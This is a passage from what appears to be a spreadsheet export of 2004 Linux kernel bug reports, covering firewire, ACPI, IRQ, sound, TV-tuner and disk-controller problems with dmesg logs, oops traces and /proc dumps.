dma_region_offset_to_bus ohci1394: Unknown symbol hpsb_alloc_host ohci1394: Unknown symbol hpsb_selfid_complete ohci1394: Unknown symbol hpsb_remove_host ohci1394: Unknown symbol hpsb_iso_packet_received ohci1394: Unknown symbol hpsb_iso_packet_sent ohci1394: Unknown symbol hpsb_packet_sent ohci1394: Unknown symbol dma_region_sync ohci1394: Unknown symbol hpsb_selfid_received ohci1394: Unknown symbol hpsb_bus_reset Steps to reproduce: Try "modprobe ohci1394"</t>
  </si>
  <si>
    <t>Asus PCDL Deluxe + 2 x Xeon + HT enabled + SATA? = system freeze</t>
  </si>
  <si>
    <t>2.4.24 2.6.x</t>
  </si>
  <si>
    <t>2004-03-03 03:32 UTC</t>
  </si>
  <si>
    <t>Richard</t>
  </si>
  <si>
    <t>2005-06-18 10:03 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake, Gentoo Hardware Environment: Asus PCDL Deluxe w/ 2x 2.8GHz P4Xeon, 512MB RAM, 1xEIDE, 1xSATA (onboard Intel/Promise SATA) Software Environment: Kernel Problem Description: System freezes when HT (hyperthreading) enabled. Error is Machine Check Exception Kernel Context Corrupt Perhaps related to SATA/ICH5R since turning OFF SATA/ICH5R in BIOS prevents problem. Steps to reproduce: Enable ACPI. Enable HT. Enable SATA in BIOS ('Enhanced Mode/Auto/SATA only'). Boot with SATA-supported kernel. In short order system will freeze with above error. (MTRR enabled)</t>
  </si>
  <si>
    <t>irq 11: nobody cared! - UHCI on IRQ11 disabled by e100 on IRQ19 - VIA Apollo Pro 133,266, Pentium III</t>
  </si>
  <si>
    <t>2004-03-03 18:35 UTC</t>
  </si>
  <si>
    <t>2004-11-04 12:53 UTC</t>
  </si>
  <si>
    <t>I have two quite different Pentium 3 SMP motherboards. Both have VIA chipset, though. After 2.6.2 (I'm not 100% sure if that was then the problem started), I get this calltrace in my dmesg after a while (between 10 minutes and a couple of hours) after I start up the computer: irq 11: nobody cared! Call Trace: [&lt;c01085e4&gt;] __report_bad_irq+0x24/0x90 [&lt;c01086d1&gt;] note_interrupt+0x61/0x90 [&lt;c01089db&gt;] do_IRQ+0x14b/0x180 [&lt;c0103000&gt;] _stext+0x0/0x50 [&lt;c038ba90&gt;] common_interrupt+0x18/0x20 [&lt;c0104be0&gt;] default_idle+0x0/0x40 [&lt;c0103000&gt;] _stext+0x0/0x50 [&lt;c0104c0c&gt;] default_idle+0x2c/0x40 [&lt;c0104c9b&gt;] cpu_idle+0x3b/0x50 [&lt;c045e8a8&gt;] start_kernel+0x168/0x1a0 [&lt;c045e490&gt;] unknown_bootoption+0x0/0x120 handlers: [&lt;c02a4eb0&gt;] (usb_hcd_irq+0x0/0x60) Disabling IRQ #11 and usb stops working. Weird thing is that it happens on both my quite different boxes, but still I haven't seen anyone else complain about it. When it happens I get this line in /proc/interrupts: 11: 100000 0 IO-APIC-level uhci_hcd The number of interrupts are not necessarily 100000, but it's alway a round number. When this was working, usb had irq 5 on both computers, now it has 11. It still works, but only for a short time. One of the boxes won't boot without acpi, the second one does, but needs noapic to work. USB then works perfectly. I'm quite confident that this is a acpi problem. And yeah, sorry to bother you all again, but this has been plaguing me for a while, and I still haven't figured it out.</t>
  </si>
  <si>
    <t>Paul Ionescu</t>
  </si>
  <si>
    <t>Firewire detected properly, but does not work.</t>
  </si>
  <si>
    <t>2.6.4-mm</t>
  </si>
  <si>
    <t>2004-03-06 20:54 UTC</t>
  </si>
  <si>
    <t>James Kyle</t>
  </si>
  <si>
    <t>2004-03-11 07:55 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: A7N8X Deluxe, iPod (I don't have any other firewire device) Software Environment: N/A Problem Description: Device Detected but times out Steps to reproduce: Plug in iPod, load sbp2 module.</t>
  </si>
  <si>
    <t>John Goerzen</t>
  </si>
  <si>
    <t>bttv tuner.c bug: can't get tv signal anymore</t>
  </si>
  <si>
    <t>2004-03-07 20:10 UTC</t>
  </si>
  <si>
    <t>satoichi</t>
  </si>
  <si>
    <t>2004-03-20 19:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat 9 Hardware Environment: Zoltrix Genie Wonder PRO TV/FM radio, ATI Radeon 7500 Software Environment: xawtv-3.90 Problem Description: After upgrading to kernel 2.6.3, my Zoltrix Genie Wonder PRO TV/FM radio card stopped working. In xawtv-3.90 I would get a screen that was partially black and the rest was scrambled. No sound from the tv card either. In the dmesg output I would get this every time I tried to run xawtv: tuner: Huh? tv_set is NULL? The radio function on the card stopped working too, just got static noise. The dmesg output was this: tuner: no radio tuning for this one, sorry. If I reboot into kernel 2.6.2 everything works again. So I did a diff on /usr/src/linux-2.6.3/drivers/media/video/tuner.c and /usr/src/linux-2.6.2/drivers/media/video/tuner.c: 749d748 &lt; case 0x30bf: 1044d1042 &lt; t-&gt;type = type; 1065d1062 &lt; case I2C_ALGO_BIT | I2C_HW_SMBUS_VOODOO3: Since those three lines were the only difference, I tried just replacing the 2.6.3 tuner.c with the 2.6.2 tuner.c and recompiled, booted into 2.6.3, and lo and behold it worked! I'm not sure which one of those 3 lines are the culprit but they definitely made a difference for me. Here is the bttv section of the dmesg output *before* I applied my 'fix': bttv: driver version 0.9.12 loaded bttv: using 8 buffers with 2080k (520 pages) each for capture bttv: Bt8xx card found (0). PCI: Found IRQ 10 for device 0000:00:0c.0 PCI: Sharing IRQ 10 with 0000:00:09.0 PCI: Sharing IRQ 10 with 0000:00:0c.1 bttv0: Bt878 (rev 17) at 0000:00:0c.0, irq: 10, latency: 32, mmio: 0xdf103000 bttv0: subsystem: 15ea:4000 (UNKNOWN) bttv0: using: Zoltrix Genie TV/FM [card=46,insmod option] tuner: chip found @ 0xc0 tuner: type forced to 21 (Temic NTSC (4039 FR5)) [insmod] tuner: type already set (21) bttv0: i2c: checking for TDA9875 @ 0xb0... not found bttv0: i2c: checking for TDA7432 @ 0x8a... not found bttv0: registered device video0 bttv0: registered device vbi0 bttv0: registered device radio0 bttv0: PLL: 28636363 =&gt; 35468950 .. ok tvaudio: TV audio decoder + audio/video mux driver tvaudio: known chips: tda9840,tda9873h,tda9874h/a,tda9850,tda9855,tea6300,tea6420,tda8425,pic16c54 (PV951),ta8874z Steps to reproduce: Here is how I load the video4linux drivers: /sbin/modprobe i2c-core /sbin/modprobe tuner type=21 debug=0 /sbin/modprobe bttv pll=1 radio=1 card=46 /sbin/modprobe msp3400 debug=1 /sbin/modprobe tvmixer /sbin/modprobe tvaudio</t>
  </si>
  <si>
    <t>Serious disk corruption with HPT374</t>
  </si>
  <si>
    <t>2004-03-08 05:48 UTC</t>
  </si>
  <si>
    <t>2004-04-05 10:38 UTC</t>
  </si>
  <si>
    <t>i did a disk setup like hpt 374 (kernel hpt366 driver) 8 drives connected all 8 drives as raid5 created a loop device with blowfish-128 created a reiser 3.6 on that loop device now this setup generates a crc error all 200mb for testing i do a file1 = 2g testfile cp file1.rar file2.rar cmp file.rar file2.rar and get always a crc error is the hpt driver in kernel serious broken ?? if yes disable it as data corruption is far worst error which can happen! this is other user "I once encountered data corruption when I was copying about 80 gigs at once from disk to disk, but the machine was overclocked by that time so I can't be sure if it was the HDD controller, CPU, chipset or memory. After that, I returned the frequencies to nominal values and the machine seems to work without hassle, as a ftp server, and also for some video processing tasks, which both are moderately hdd-intensive." he got too data corruption</t>
  </si>
  <si>
    <t>radeonfb displays strange stuff at boot time and doesn't erase screen correctly</t>
  </si>
  <si>
    <t>2004-03-09 05:51 UTC</t>
  </si>
  <si>
    <t>Distribution: debian Hardware Environment:ATI Technologies Inc Radeon Mobility M7 LW [Radeon Mobility 7500] Software Environment: Problem Description: When booting with radeonfb built into kernel, i first have some garbage displayed on the screen, but as the messages scroll, the garbage goes. After that, there seems to be a problem when 'clearing' the screen. It's like it only wipes 1 line out of 2 (looks like an interleaved video). Switching VT solves the problem until text reaches bottom of the screen and start to overlap. I tried to use radeonfb as a module, but it seems to be unsable (using fbset always gives a totally unusable screen) Steps to reproduce: Build radeonfb (with DDC support) into the kernel.</t>
  </si>
  <si>
    <t>C1 uses "halt" instead of "monitor/mwait"</t>
  </si>
  <si>
    <t>2.6.4-rc2</t>
  </si>
  <si>
    <t>2004-03-09 22:10 UTC</t>
  </si>
  <si>
    <t>2004-11-15 19:41 UTC</t>
  </si>
  <si>
    <t>Venkatesh Pallipadi</t>
  </si>
  <si>
    <t>the ACPI-enabled kernel calls "halt" in the idle loop for C1, but it never calls "monitor/mwait", which if available would save more power.</t>
  </si>
  <si>
    <t>2.6.4-rc3</t>
  </si>
  <si>
    <t>2004-03-10 08:21 UTC</t>
  </si>
  <si>
    <t>2004-05-11 23:32 UTC</t>
  </si>
  <si>
    <t>Distribution: FC2test modprobe button rmmod button triggers an assert in remove_proc_entry() which we added to avoid datacorruption, eg on calling remove_proc_entry() on a non-empty directory. ------------[ cut here ]------------ kernel BUG at fs/proc/generic.c:664! invalid operand: 0000 [#1] SMP CPU: 1 EIP: 0060:[&lt;0219300d&gt;] Not tainted EFLAGS: 00010202 (2.6.3-2.1.247.rootsmp) EIP is at remove_proc_entry+0xa6/0xf5 eax: 39fd9ee0 ebx: 4287e5f5 ecx: 00000000 edx: 39fd9ee0 esi: 39fd9ee0 edi: 413a9d98 ebp: 00000006 esp: 18f0df50 ds: 007b es: 007b ss: 0068 Process rmmod (pid: 2987, threadinfo=18f0d000 task=03ed0770) Stack: 39fd9eb0 4287e5f5 4287ef80 00000000 022eeb38 18f0d000 4287e4b2 0213becf 00000000 74747562 11006e6f 11fd2318 f7098000 021548aa 381b29ec f7099000 02154d40 11fd2354 381b2318 20d813e4 00000246 11fd2318 11fd2340 00000000 Call Trace: [&lt;4287e4b2&gt;] acpi_button_exit+0x1a/0x1b [button] [&lt;0213becf&gt;] sys_delete_module+0x100/0x121 [&lt;021548aa&gt;] unmap_vma_list+0xe/0x17 [&lt;02154d40&gt;] do_munmap+0x189/0x195 Code: 0f 0b 98 02 5a de 2b 02 8b 47 40 85 c0 75 09 89 f8 e8 0c ff</t>
  </si>
  <si>
    <t>2.6.4-mm1</t>
  </si>
  <si>
    <t>debug messages for events in evmisc.c are not ACPI 2.0c compliant</t>
  </si>
  <si>
    <t>2.6.4 and bellow</t>
  </si>
  <si>
    <t>2004-03-11 12:30 UTC</t>
  </si>
  <si>
    <t>2004-05-28 14:35 UTC</t>
  </si>
  <si>
    <t>Distribution: any Hardware Environment: any Software Environment: any Problem Description: I thing that the debug messages reffering to events from drivers/acpi/events/evmisc.c are not right. In the ACPI 2.0c spec, at page 144, chapter "5.6.3 Device Object Notifications", we find the following acpi events: 0 Bus Check. 1 Device Check. 2 Device Wake. 3 Eject Request. etc. The debug messages from ev_queue_notify_request is different. Steps to reproduce: n/a</t>
  </si>
  <si>
    <t>middle button no longer works on 3-button wheelmouse</t>
  </si>
  <si>
    <t>2004-03-11 14:08 UTC</t>
  </si>
  <si>
    <t>Henk Muller</t>
  </si>
  <si>
    <t>2005-12-20 23:36 UTC</t>
  </si>
  <si>
    <t>Distribution: fedora Hardware Environment: amd-k7 Software Environment: Problem Description: I bought an el-cheapo cordless wheelmouse (Maplin, RF Cordless Wheel Mouse), and the middle button refuses to work. The mouse works find under a 2.4 kernel. This problem is also reported on: http://www.ussg.iu.edu/hypermail/linux/kernel/0310.3/1293.html The mouse is recognised as a two-button mouse, even though it has three buttons, hence the middle button does not work. I hacked logips2pp.c to solve my problem. You can argue that the mouse is wrong and that the kernel is right... Steps to reproduce: Just reboot.</t>
  </si>
  <si>
    <t>Bad: Scheduling while atomic</t>
  </si>
  <si>
    <t>2004-03-12 16:48 UTC</t>
  </si>
  <si>
    <t>2004-07-05 12:25 UTC</t>
  </si>
  <si>
    <t>Using 2.6.4-mm1 with SMT support unable to boot into 2.6.4-mm1, 2.6.4-rc2-mm1 works fine. The errors start pouring through before any logging even takes place, many too fast to read anything, the only message im able to pickup is bad: Scheduling while atmoic. Sorry for the lack of info, but I thought it would be better to at least report the problem.</t>
  </si>
  <si>
    <t>can't mount camera</t>
  </si>
  <si>
    <t>2.6.4</t>
  </si>
  <si>
    <t>2004-03-13 03:18 UTC</t>
  </si>
  <si>
    <t>2004-03-13 06:44 UTC</t>
  </si>
  <si>
    <t>It used to work with the 2.4.* series, but now it doesn't. I have had already a bug related to this, in here: http://bugme.osdl.org/show_bug.cgi?id=1822 but although it had a quick fix, it still can't mount automagically my camera.</t>
  </si>
  <si>
    <t>Kernel crash when moving huge files</t>
  </si>
  <si>
    <t>2.6.4-bk2</t>
  </si>
  <si>
    <t>2004-03-13 09:26 UTC</t>
  </si>
  <si>
    <t>Johan Fischer</t>
  </si>
  <si>
    <t>2004-04-20 04:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux unstable Hardware Environment: Laptop Toshiba Satellite 2410-514, P4-M 2GHz, 256Mo DDR, HD 30GBytes IDE, DVD-Combo IDE, Chipset Intel, FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller. For the external part : HD IDE in a box connected to the firewire + DVD Burner Sony also connected to the firewire. Software Environment: Gnome 2.6.0 beta 2 (CVS HEAD gnome.org) Problem Description: When copying or moving a file &gt; 200Mbytes, the kernel crashed with an Oops fatal exception. Steps to reproduce: - mount the external Hard drive - copy or move a movie (this kind of file are always big enough to test) from the local HD to the external HD (didn't test the other way yet) - during the move, the kernel should crash. This is the ksymoops output: ksymoops 2.4.9 on i686 2.6.4-bk2. Options used -V (default) -k /proc/ksyms (default) -l /proc/modules (default) -o /lib/modules/2.6.4-bk2/ (default) -m /boot/System.map-2.6.4-bk2 (default) Warning: You did not tell me where to find symbol information. I will assume that the log matches the kernel and modules that are running right now and I'll use the default options above for symbol resolution. If the current kernel and/or modules do not match the log, you can get more accurate output by telling me the kernel version and where to find map, modules, ksyms etc. ksymoops -h explains the options. Error (regular_file): read_ksyms stat /proc/ksyms failed No modules in ksyms, skipping objects No ksyms, skipping lsmod Unable to handle kernel paging request at virtual address 00100104 d193d9b7 *pde = 00000000 Oops: 0002 [#1] CPU: 0 EIP: 0060:[&lt;d193d9b7&gt;] Not tainted Using defaults from ksymoops -t elf32-i386 -a i386 EFLAGS: 00010047 (2.6.4-bk2) eax: 00100100 ebx: cdacc000 ecx: c86fb884 edx: 00200200 esi: 00000001 edi: c86fb884 ebp: c0405ec4 esp: c0405ec0 ds: 007b es: 007b ss: 0068 Stack: cdacec40 c0405f00 d199ca7a cdacc000 c86fb884 00000001 cdacc000 c0405f0c 00002002 c4cc8ea8 cdacec6c 00000296 cdaceac0 00000000 c0441828 0000000a c0405f10 c012c39e cdacec40 00000001 c0405f2c c012c1e0 c0441828 00000046 Call Trace: [&lt;d199ca7a&gt;] dma_trm_tasklet+0xf0/0x2a5 [ohci1394] [&lt;c012c39e&gt;] tasklet_action+0x43/0x65 [&lt;c012c1e0&gt;] do_softirq+0x98/0x9a [&lt;c010a9e6&gt;] do_IRQ+0x24f/0x39d [&lt;c01089a8&gt;] common_interrupt+0x18/0x20 [&lt;d1982254&gt;] acpi_processor_idle+0xe6/0x1e2 [processor] [&lt;c0103000&gt;] rest_init+0x0/0xf4 [&lt;c01050b7&gt;] cpu_idle+0x2f/0x38 [&lt;c040673c&gt;] start_kernel+0x1d3/0x243 [&lt;c040642e&gt;] unknown_bootoption+0x0/0x108 Code: 89 50 04 89 02 c7 41 04 00 02 20 00 c7 01 00 01 10 00 c6 41 &gt;&gt;EIP; d193d9b7 &lt;pg0+114dd9b7/3fb9e000&gt; &lt;===== &gt;&gt;ebx; cdacc000 &lt;pg0+d66c000/3fb9e000&gt; &gt;&gt;ecx; c86fb884 &lt;pg0+829b884/3fb9e000&gt; &gt;&gt;edi; c86fb884 &lt;pg0+829b884/3fb9e000&gt; &gt;&gt;ebp; c0405ec4 &lt;init_thread_union+1ec4/2000&gt; &gt;&gt;esp; c0405ec0 &lt;init_thread_union+1ec0/2000&gt; Trace; d199ca7a &lt;pg0+1153ca7a/3fb9e000&gt; Trace; c012c39e &lt;tasklet_action+43/65&gt; Trace; c012c1e0 &lt;do_softirq+98/9a&gt; Trace; c010a9e6 &lt;do_IRQ+24f/39d&gt; Trace; c01089a8 &lt;common_interrupt+18/20&gt; Trace; d1982254 &lt;pg0+11522254/3fb9e000&gt; Trace; c0103000 &lt;_stext+0/0&gt; Trace; c01050b7 &lt;cpu_idle+2f/38&gt; Trace; c040673c &lt;start_kernel+1d3/243&gt; Trace; c040642e &lt;unknown_bootoption+0/108&gt; Code; d193d9b7 &lt;pg0+114dd9b7/3fb9e000&gt; 00000000 &lt;_EIP&gt;: Code; d193d9b7 &lt;pg0+114dd9b7/3fb9e000&gt; &lt;===== 0: 89 50 04 mov %edx,0x4(%eax) &lt;===== Code; d193d9ba &lt;pg0+114dd9ba/3fb9e000&gt; 3: 89 02 mov %eax,(%edx) Code; d193d9bc &lt;pg0+114dd9bc/3fb9e000&gt; 5: c7 41 04 00 02 20 00 movl $0x200200,0x4(%ecx) Code; d193d9c3 &lt;pg0+114dd9c3/3fb9e000&gt; c: c7 01 00 01 10 00 movl $0x100100,(%ecx) Code; d193d9c9 &lt;pg0+114dd9c9/3fb9e000&gt; 12: c6 41 00 00 movb $0x0,0x0(%ecx) &lt;0&gt;Kernel panic: Fatal exception in interrupt 1 warning and 1 error issued. Results may not be reliable. CPUInfo : processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Mobile Intel(R) Pentium(R) 4 - M CPU 2.00GHz stepping : 7 cpu MHz : 1993.607 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe cid bogomips : 3932.16 Modules info (note that even without the nvidia module which taint the kernel, the problem occurs): nls_iso8859_1 4096 1 - Live 0xd1c58000 isofs 33132 1 - Live 0xd1c4e000 zlib_inflate 21376 1 isofs, Live 0xd1c85000 nvidia 2075688 12 - Live 0xd1eae000 oprofile 27584 0 - Live 0xd1afe000 ipv6 253312 6 - Live 0xd1abf000 snd_intel8x0 33924 2 - Live 0xd1aa9000 snd_ac97_codec 63492 1 snd_intel8x0, Live 0xd1b67000 snd_pcm 102820 2 snd_intel8x0, Live 0xd1bcc000 snd_timer 32260 1 snd_pcm, Live 0xd1aa0000 snd_page_alloc 9860 2 snd_intel8x0,snd_pcm, Live 0xd1a9c000 snd_mpu401_uart 9344 1 snd_intel8x0, Live 0xd1a98000 snd_rawmidi 26528 1 snd_mpu401_uart, Live 0xd1a90000 snd_seq_device 7432 1 snd_rawmidi, Live 0xd1ab7000 snd 54756 10 snd_intel8x0,snd_ac97_codec,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device, Live 0xd1a81000 soundcore 9312 1 snd, Live 0xd1abb000 fan 3468 0 - Live 0xd1a60000 button 5016 0 - Live 0xd1a5d000 thermal 11664 0 - Live 0xd1a59000 evdev 8576 0 - Live 0xd1a4d000 cpufreq_userspace 4948 2 - Live 0xd198b000 acpi 3980 0 - Live 0xd1989000 freq_table 3716 1 acpi, Live 0xd1987000 processor 15152 2 thermal,acpi, Live 0xd1982000 agpgart 26432 0 - Live 0xd197a000 sbp2 24712 0 - Live 0xd1972000 sd_mod 18432 0 - Live 0xd196c000 sr_mod 14628 0 - Live 0xd1967000 sg 34720 0 - Live 0xd195d000 ohci1394 38020 0 - Live 0xd1998000 ieee1394 99124 2 sbp2,ohci1394, Live 0xd193d000 battery 8204 0 - Live 0xd1939000 ac 3980 0 - Live 0xd192e000 toshiba_acpi 5404 0 - Live 0xd1936000 toshiba 4504 0 - Live 0xd1958000 eepro100 31116 0 - Live 0xd1921000 msr 3328 0 - Live 0xd191f000 microcode 6944 0 - Live 0xd191c000 cpuid 3072 0 - Live 0xd191a000 msdos 11392 0 - Live 0xd1916000 fat 47392 1 msdos, Live 0xd1909000 binfmt_misc 9352 0 - Live 0xd1905000 binfmt_aout 6668 0 - Live 0xd192b000 n_hdlc 11268 0 - Live 0xd1930000 usb_storage 102800 0 - Live 0xd18e6000 hid 33216 0 - Live 0xd18dc000 usbmouse 4736 0 - Live 0xd1902000 usbcore 111708 4 usb_storage,hid,usbmouse, Live 0xd1a64000 Hope that i didn't forget anything. Thx.</t>
  </si>
  <si>
    <t>PROBLEM: snd-intel8x0 mmap mode stuttering</t>
  </si>
  <si>
    <t>2004-03-14 09:54 UTC</t>
  </si>
  <si>
    <t>Mikael Leivisk</t>
  </si>
  <si>
    <t>2004-12-05 06:32 UTC</t>
  </si>
  <si>
    <t>The soundcard is a builtin ac97 (running the builtin kernel nvidia audio driver ( snd-intel8x0 )) on a nForce2 motherboard ( epox 8rda(-) ) All sounds works fine with 2.6.0 but after recent uppgrade to 2.6.4 I get small stuttering sound artefacts using alsa and mmap mode and no sound at all in quake3. All other sounds plays good &lt;Quake 3 console error&gt; ------- sound initialization ------- Could not mmap dma buffer PROT_WRITE|PROT_READ trying mmap PROT_WRITE (with associated better compatibility / less performance code) /dev/dsp: Input/output error Could not mmap /dev/dsp &lt;/Quake 3 console error&gt; Also there seems to be some IRQ problems as I get no sound at all in either of the kernels without the pci=no-acpi kernel option. Kernel giving me this in the logs: ---------------------------- Mar 14 17:02:57 [kernel] ALSA device list: Mar 14 17:02:57 [kernel] #0: NVidia nForce2 at 0xe2001000, irq 21 Mar 14 17:02:57 [kernel] NET: Registered protocol family 2 Mar 14 17:02:57 [kernel] IP: routing cache hash table of 4096 buckets, 32Kbytes Mar 14 17:02:57 [kernel] NET: Registered protocol family 1 Mar 14 17:02:57 [kernel] NET: Registered protocol family 17 Mar 14 17:02:57 [kernel] usb 1-1: new low speed USB device using address 2 Mar 14 17:02:57 [kernel] found reiserfs format "3.6" with standard journal Mar 14 17:02:57 [kernel] input: USB HID v1.10 Mouse [Logitech USB-PS/2 Optical Mouse] on usb-0000:00:02.0-1 Mar 14 17:02:57 [kernel] irq 21: nobody cared! Mar 14 17:02:57 [kernel] Call Trace: Mar 14 17:02:57 [kernel] [&lt;c010b1ca&gt;] __report_bad_irq+0x2a/0x90 Mar 14 17:02:57 [kernel] [&lt;c010b2bc&gt;] note_interrupt+0x6c/0xa0 Mar 14 17:02:57 [kernel] [&lt;c010b591&gt;] do_IRQ+0x121/0x130 Mar 14 17:02:57 [kernel] [&lt;c0105000&gt;] _stext+0x0/0x60 Mar 14 17:02:57 [kernel] [&lt;c01098b4&gt;] common_interrupt+0x18/0x20 Mar 14 17:02:57 [kernel] [&lt;c0105000&gt;] _stext+0x0/0x60 Mar 14 17:02:57 [kernel] [&lt;c0106c13&gt;] default_idle+0x23/0x30 Mar 14 17:02:57 [kernel] [&lt;c0106c7c&gt;] cpu_idle+0x2c/0x40 Mar 14 17:02:57 [kernel] [&lt;c044e743&gt;] start_kernel+0x163/0x180 Mar 14 17:02:57 [kernel] [&lt;c044e480&gt;] unknown_bootoption+0x0/0x120 Mar 14 17:02:57 [kernel] handlers: Mar 14 17:02:57 [kernel] [&lt;c02ee0e0&gt;] (snd_intel8x0_interrupt+0x0/0x210) ---------------------------- I'm quite unsure of what other info I should supply... oh I'm running gentoo, and kernel from kernel.org ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- /usr/src/linux::root (18:31:39) &gt;&gt; sh scripts/ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux Archangel 2.6.4 #2 Sun Mar 14 17:11:03 CET 2004 i686 AMD Athlon(tm) XP 2500+ AuthenticAMD GNU/Linux Gnu C 3.3.2 Gnu make 3.80 util-linux 2.12 mount 2.12 module-init-tools 0.9.15-pre4 e2fsprogs 1.34 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.15 Net-tools 1.60 Kbd 1.08 Sh-utils 5.0.91 Modules Loaded nvidia ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- /usr/src/linux::root (18:31:44) &gt;&gt; cat /proc/version Linux version 2.6.4 (root@Archangel) (gcc version 3.3.2 20031218 (Gentoo Linux 3.3.2-r5, propolice-3.3-7)) #2 Sun Mar 14 17:11:03 CET 2004 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- /usr/src/linux::root (18:42:46) &gt;&gt; cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 10 model name : AMD Athlon(tm) XP 2500+ stepping : 0 cpu MHz : 1837.746 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow bogomips : 3629.05 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- /usr/src/linux::root (18:43:26) &gt;&gt; cat /proc/modules nvidia 1698604 10 - Live 0xe0ab5000 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- /usr/src/linux::root (18:44:11) &gt;&gt; cat /proc/ioports 0000-001f : dma1 0020-0021 : pic1 0040-005f : timer 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 0376-0376 : ide1 03c0-03df : vga+ 03f6-03f6 : ide0 0cf8-0cff : PCI conf1 c000-cfff : PCI Bus #01 c000-c0ff : 0000:01:0b.0 c000-c0ff : eth0 d400-d4ff : 0000:00:06.0 d800-d87f : 0000:00:06.0 d800-d83f : NVidia nForce2 - Controller e400-e41f : 0000:00:01.1 f000-f00f : 0000:00:09.0 f000-f007 : ide0 f008-f00f : ide1 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- /usr/src/linux::root (18:44:36) &gt;&gt; cat /proc/iomem 00000000-0009ffff : System RAM 000a0000-000bffff : Video RAM area 000c0000-000c7fff : Video ROM 000f0000-000fffff : System ROM 00100000-1ffeffff : System RAM 00100000-00358560 : Kernel code 00358561-0044a4ff : Kernel data 1fff0000-1fff2fff : ACPI Non-volatile Storage 1fff3000-1fffffff : ACPI Tables c0000000-cfffffff : 0000:00:00.0 d0000000-d7ffffff : PCI Bus #02 d0000000-d7ffffff : 0000:02:00.0 d8000000-dfffffff : PCI Bus #01 d8000000-dbffffff : 0000:01:08.0 dc010000-dc010fff : 0000:01:0b.0 dc010000-dc010fff : eth0 e0000000-e1ffffff : PCI Bus #02 e0000000-e0ffffff : 0000:02:00.0 e2001000-e2001fff : 0000:00:06.0 e2001000-e20011ff : NVidia nForce2 - AC'97 e2003000-e2003fff : 0000:00:02.0 e2003000-e2003fff : ohci_hcd e2004000-e2004fff : 0000:00:02.1 e2004000-e2004fff : ohci_hcd e2005000-e20050ff : 0000:00:02.2 fec00000-fec00fff : reserved fee00000-fee00fff : reserved ffff0000-ffffffff : reserved ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- /usr/src/linux::root (18:45:27) &gt;&gt; cat /proc/pci PCI devices found: Bus 0, device 0, function 0: Host bridge: nVidia Corporation nForce2 AGP (different version?) (rev 193). Prefetchable 32 bit memory at 0xc0000000 [0xcfffffff]. Bus 0, device 0, function 1: RAM memory: nVidia Corporation nForce2 Memory Controller 1 (rev 193). Bus 0, device 0, function 2: RAM memory: nVidia Corporation nForce2 Memory Controller 4 (rev 193). Bus 0, device 0, function 3: RAM memory: nVidia Corporation nForce2 Memory Controller 3 (rev 193). Bus 0, device 0, function 4: RAM memory: nVidia Corporation nForce2 Memory Controller 2 (rev 193). Bus 0, device 0, function 5: RAM memory: nVidia Corporation nForce2 Memory Controller 5 (rev 193). Bus 0, device 1, function 0: ISA bridge: nVidia Corporation nForce2 ISA Bridge (rev 163). Bus 0, device 1, function 1: SMBus: nVidia Corporation nForce2 SMBus (MCP) (rev 162). IRQ 11. Master Capable. No bursts. Min Gnt=3.Max Lat=1. I/O at 0xe400 [0xe41f]. Bus 0, device 2, function 0: USB Controller: nVidia Corporation nForce2 USB Controller (rev 163). IRQ 4. Master Capable. No bursts. Min Gnt=3.Max Lat=1. Non-prefetchable 32 bit memory at 0xe2003000 [0xe2003fff]. Bus 0, device 2, function 1: USB Controller: nVidia Corporation nForce2 USB Controller (#2) (rev 163). IRQ 3. Master Capable. No bursts. Min Gnt=3.Max Lat=1. Non-prefetchable 32 bit memory at 0xe2004000 [0xe2004fff]. Bus 0, device 2, function 2: USB Controller: nVidia Corporation nForce2 USB Controller (rev 163). IRQ 7. Master Capable. No bursts. Min Gnt=3.Max Lat=1. Non-prefetchable 32 bit memory at 0xe2005000 [0xe20050ff]. Bus 0, device 6, function 0: Multimedia audio controller: nVidia Corporation nForce2 AC97 Audio Controler (MCP) (rev 161). IRQ 5. Master Capable. No bursts. Min Gnt=2.Max Lat=5. I/O at 0xd400 [0xd4ff]. I/O at 0xd800 [0xd87f]. Non-prefetchable 32 bit memory at 0xe2001000 [0xe2001fff]. Bus 0, device 8, function 0: PCI bridge: nVidia Corporation nForce2 External PCI Bridge (rev 163). Master Capable. No bursts. Min Gnt=2. Bus 0, device 9, function 0: IDE interface: nVidia Corporation nForce2 IDE (rev 162). Master Capable. No bursts. Min Gnt=3.Max Lat=1. I/O at 0xf000 [0xf00f]. Bus 0, device 30, function 0: PCI bridge: nVidia Corporation nForce2 AGP (rev 193). Master Capable. Latency=32. Min Gnt=10. Bus 1, device 8, function 0: VGA compatible controller: S3 Inc. 86c325 [ViRGE] (rev 6). IRQ 12. Master Capable. Latency=32. Min Gnt=4.Max Lat=255. Non-prefetchable 32 bit memory at 0xd8000000 [0xdbffffff]. Bus 1, device 11, function 0: Ethernet controller: National Semiconductor Corporation DP83815 